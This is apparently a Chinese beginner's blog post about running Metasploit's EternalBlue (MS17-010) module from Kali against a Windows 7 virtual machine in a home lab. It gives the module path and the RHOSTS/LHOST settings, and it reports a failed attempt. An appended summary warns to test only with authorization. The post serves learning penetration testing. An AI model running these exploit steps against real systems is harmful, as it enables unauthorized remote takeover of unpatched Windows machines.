【MSF】Kali最强渗透工具之Metasploit

1.什么是Metaspolit?

        msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

       类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。

2.体验Kali渗透工具——metasploit

metasploit攻击windows操作系统

msfconsole:启动metasploit命令行

启动metasploit前需要做:

- 打开kali终端

- 使用sudo su 命令,并输入kali的密码kali,切换至root用户

- 使用msfdb init命令 初始化metasploit数据库(*可选)

 打开kali终端,输入sudo su,输入密码kali后可以看到如下图所示界面:

输入msfconsole,即可打开msf6版本(也可以是mfs5版本),加载中如下图所示:

加载完成打开msf后界面如下图所示:

3.“永恒之蓝”漏洞

      永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

metasploit攻击永恒之蓝全流程:

1.使用模块

use exploit/windows/smb/ms17_010_eternalblue

2.设置必选项

→查看必选项[*required为yes的就是必选项]

show options

3.1查找模块

查找模块 search 模块名,例如此处永恒之蓝即ms17_010

3.2使用模块

       如果要使用上述呈现出的四个模块中的一个模块,可以通过use 模块号 或者use 模块名,如下图所示:

3.3查看必选项

       接着在设置必选项之前先查看必选项,使用命令show options 或者直接输入options,如下图所示:

       选择一个操作系统(2017年之前的版本一般都有永恒之蓝漏洞),建议选择Windows7 64位操作系统,这里就省略VMware Workstation安装Windows7的步骤了。

这里提供一个操作系统下载网址:msdn.itellyou.cn

      此处安装的是windows7 64x虚拟机,使之与kali虚拟机在同一网段中,即两台虚拟机能够互相ping通。

在windows7虚拟机中查看IP地址,使用ipconfig命令,如下图所示:

       可以得知该windows虚拟机的IP地址为192.168.1.129,ping 192.168.1.136,ping通如下所示:

      在kali机终端也执行以下命令ping 192.168.1.129(windows7 ip),ping通如下图所示:

此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。如下图所示:

3.4设置必选项

3.4.1 设置RHOSTS

输入命令set  RHOSTS 192.168.1.129   (Windows7 IP),如下图所示:

3.4.2 设置Payload options

输入命令 set LHOST 192.168.1.136   (kali机IP),如下图所示:

LPORT可以随意修改,只要端口没有被占用均可。

设置完成后再次通过show options查看必选项,如下图所示:

3.5 run实现攻击模块

(Windows7靶机)

Exploit completed, but no session was created.此时显示攻击完成,但未创建会话。

又遇到问题啦

此时说明攻击者没有获取到目标系统的远程访问权限。

开启方法:将远程连接开启,win7下右击我的电脑选择属性,属性窗口选择左边的远程设置,远程协议勾选,远程桌面选择允许任意版本远程桌面的计算机连接,如下图所示:

学到这报一丝,还是没能成功,渗透攻击有可能成功也有可能失败,漏洞在不断修复之中,对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~

求大佬带带!呜呜~小邹加油呀

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Kali是一个被广泛应用于渗透测试和网络安全的Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值